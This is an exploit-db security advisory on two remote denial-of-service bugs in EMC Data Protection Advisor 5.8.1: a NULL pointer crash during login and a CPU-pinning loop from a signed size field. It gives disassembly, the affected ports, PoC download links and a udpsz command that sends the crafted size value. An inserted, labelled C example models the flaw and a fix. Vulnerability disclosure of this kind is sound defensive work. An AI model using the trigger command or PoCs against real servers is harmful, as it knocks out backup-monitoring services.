EMC Data Protection Advisor 5.8.1 - Denial of Service

31 Mar 2012 | Reported by Luigi Auriemma | Type: exploitdb | Source: www.exploit-db.com

EMC Data Protection Advisor 5.8.1 - Denial of Service vulnerability due to a NULL pointer dereference and thread CPU usage

Code
#######################################################################

                             Luigi Auriemma

Application:  EMC Data Protection Advisor
              http://www.emc.com/backup-and-recovery/data-protection-advisor/data-protection-advisor.htm
Versions:     <= 5.8.1
Platforms:    AIX, HP-UX, Linux, Solaris, Windows
Bugs:         A] cProcessAuthenticationData NULL pointer
              B] thread CPU 100%
Exploitation: remote
Date:         29 Mar 2012
Author:       Luigi Auriemma
              e-mail: [email protected]
              web:    aluigi.org


#######################################################################


1) Introduction
2) Bugs
3) The Code
4) Fix


#######################################################################

===============
1) Introduction
===============


From vendor's homepage:
"EMC Data Protection Advisor: Manage service levels, reduce complexity,
and eliminate manual efforts with EMC’s powerful data protection
management software that automates monitoring, analysis, alerting, and
reporting across backup, replication, and virtual environments."


#######################################################################

=======
2) Bugs
=======

------------------------------------------
A] cProcessAuthenticationData NULL pointer
------------------------------------------

A missing or empty password field in the AUTHENTICATECONNECTION command
required to log in leads to a NULL pointer dereference in the
DPA_Utilities.cProcessAuthenticationData function: decodeString returns
NULL and the inline strlen() loop dereferences it:

  10042EA0  /$ 55             PUSH EBP
  10042EA1  |. 8BEC           MOV EBP,ESP
  10042EA3  |. 83EC 0C        SUB ESP,0C
  10042EA6  |. A1 B04F0C10    MOV EAX,DWORD PTR DS:[100C4FB0]
  10042EAB  |. 33C5           XOR EAX,EBP
  10042EAD  |. 8945 FC        MOV DWORD PTR SS:[EBP-4],EAX
  10042EB0  |. 53             PUSH EBX
  10042EB1  |. 56             PUSH ESI
  10042EB2  |. 8BF1           MOV ESI,ECX
  10042EB4  |. 57             PUSH EDI
  10042EB5  |. 56             PUSH ESI
  10042EB6  |. E8 93E3FBFF    CALL DPA_Util.decodeString
  10042EBB  |. 8BC8           MOV ECX,EAX
  10042EBD  |. 83C4 08        ADD ESP,8
  10042EC0  |. 8D59 01        LEA EBX,DWORD PTR DS:[ECX+1]
  10042EC3  |> 8A11           /MOV DL,BYTE PTR DS:[ECX]     ; strlen() NULL pointer
  10042EC5  |. 83C1 01        |ADD ECX,1
  10042EC8  |. 84D2           |TEST DL,DL
  10042ECA  |.^75 F7          \JNZ SHORT DPA_Util.10042EC3


------------------
B] thread CPU 100%
------------------

An endless loop occurs in the DPA_Utilities library while handling the
protocol if a negative 64-bit size field is used, because the size is
compared as a signed value and no data is consumed on that path:

  100138FC   > 3BF1           CMP ESI,ECX
  100138FE   . 75 0C          JNZ SHORT DPA_Util.1001390C
  10013900   . 8B55 E4        MOV EDX,DWORD PTR SS:[EBP-1C]
  10013903   . 0B55 E8        OR EDX,DWORD PTR SS:[EBP-18]
  10013906   . 0F84 C1020000  JE DPA_Util.10013BCD
  1001390C   > 2975 DC        SUB DWORD PTR SS:[EBP-24],ESI
  1001390F   . 68 20870910    PUSH DPA_Util.10098720        ; "nsReadRequest"
  ...
  100137F0   > 8B7D 08        MOV EDI,DWORD PTR SS:[EBP+8]
  100137F3   > 8B75 E4        MOV ESI,DWORD PTR SS:[EBP-1C]
  100137F6   > 837D E8 00     CMP DWORD PTR SS:[EBP-18],0   ; signed comparison
  100137FA   . 7F 4A          JG SHORT DPA_Util.10013846
  100137FC   . 7C 04          JL SHORT DPA_Util.10013802
  100137FE   . 85F6           TEST ESI,ESI
  10013800   . 77 44          JA SHORT DPA_Util.10013846
  10013802   > 837D E0 00     CMP DWORD PTR SS:[EBP-20],0   ; signed comparison
  10013806   . 0F8C 0B040000  JL DPA_Util.10013C17
  1001380C   . 7F 0A          JG SHORT DPA_Util.10013818
  1001380E   . 837D DC 00     CMP DWORD PTR SS:[EBP-24],0
  10013812   . 0F86 FF030000  JBE DPA_Util.10013C17
  10013818   > BF 1B700910    MOV EDI,DPA_Util.1009701B
  1001381D   . 33F6           XOR ESI,ESI
  1001381F   > 33C9           XOR ECX,ECX
  10013821   . 894D F4        MOV DWORD PTR SS:[EBP-C],ECX
  10013824   . 894D F0        MOV DWORD PTR SS:[EBP-10],ECX
  10013827   . 390B           CMP DWORD PTR DS:[EBX],ECX
  10013829   . 894D F8        MOV DWORD PTR SS:[EBP-8],ECX
  1001382C   . 894D EC        MOV DWORD PTR SS:[EBP-14],ECX
  1001382F   . 0F84 C7000000  JE DPA_Util.100138FC

Note that this loop only pins one thread; it does not affect the other
connections to the affected service.
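As an added illustration (not the advisory's or DPA's code), a constructed C model of the loop above: a length-prefixed frame reader whose 64-bit size field is compared as a signed value, beside a hardened reader that treats the field as unsigned, bounds it and stops on a malformed frame. The frame layout, the function names and the MAX_SPINS/MAX_FRAME bounds are assumptions made for this example.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
/* Added illustration, not DPA's code: frames of an 8-byte big-endian size plus
   that many payload bytes, read by a hypothetical parser mirroring the listing. */
#define MAX_SPINS 1000u  /* bound so the vulnerable loop can be observed */
#define MAX_FRAME 65536u /* sane upper bound for one frame's payload */
static uint64_t rd64be(const uint8_t *p) {
    uint64_t v = 0;
    for (int i = 0; i < 8; i++) v = (v << 8) | p[i];
    return v;
}
/* Vulnerable pattern: size compared as signed. A size <= 0 consumes nothing yet
   the loop repeats. Returns frames consumed, or -1 after MAX_SPINS idle passes. */
int consume_frames_signed(const uint8_t *buf, size_t len) {
    size_t remaining = len; int frames = 0;
    for (unsigned spins = 0; spins < MAX_SPINS; spins++) {
        if (remaining < 8) return frames;
        int64_t size = (int64_t)rd64be(buf + len - remaining);
        if (size > 0) {                          /* the JG/JL/JA path above */
            if ((uint64_t)size > remaining - 8) return frames;
            remaining -= 8 + (size_t)size;
            frames++;
        }   /* size <= 0: remaining unchanged, like SUB [EBP-24],ESI with ESI=0 */
    }
    return -1;  /* the 100% CPU condition */
}
/* Hardened form: unsigned, bounded size; each pass consumes bytes or stops.
   Returns frames consumed, or -2 on a malformed size field. */
int consume_frames_fixed(const uint8_t *buf, size_t len) {
    size_t remaining = len; int frames = 0;
    while (remaining >= 8) {
        uint64_t size = rd64be(buf + len - remaining);
        if (size == 0 || size > MAX_FRAME || size > remaining - 8) return -2;
        remaining -= 8 + (size_t)size;
        frames++;
    }
    return frames;
}
/* Constructed sample: two 3-byte frames, then a header whose size field is
   tail_size; runs the chosen reader over its first len bytes (0 = all 30). */
int scan_sample(int hardened, uint64_t tail_size, size_t len) {
    static const uint8_t good[] = {0,0,0,0,0,0,0,3,'a','b','c'};
    uint8_t buf[30];
    memcpy(buf, good, 11); memcpy(buf + 11, good, 11);
    for (int i = 7; i >= 0; i--) { buf[22 + i] = (uint8_t)tail_size; tail_size >>= 8; }
    if (len == 0 || len > 30) len = 30;
    return hardened ? consume_frames_fixed(buf, len) : consume_frames_signed(buf, len);
}
```

With tail_size set to 0xFFFFFFFFFFFFFFFF (the value the udpsz PoC sends, -1 when read as signed), the signed reader spins without consuming anything while the hardened reader rejects the frame immediately.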


Both bugs can be triggered through the following services:
- DPA_Controller on port 3916
- DPA_Listener   on port 4001


#######################################################################

===========
3) The Code
===========


A]
http://aluigi.org/poc/dpa_1.zip

  dpa_1 SERVER

B]
http://aluigi.org/testz/udpsz.zip

  udpsz -c "18446744073709551615/1/UNB" -T SERVER 3916 -1


#######################################################################

======
4) Fix
======


No fix.


#######################################################################
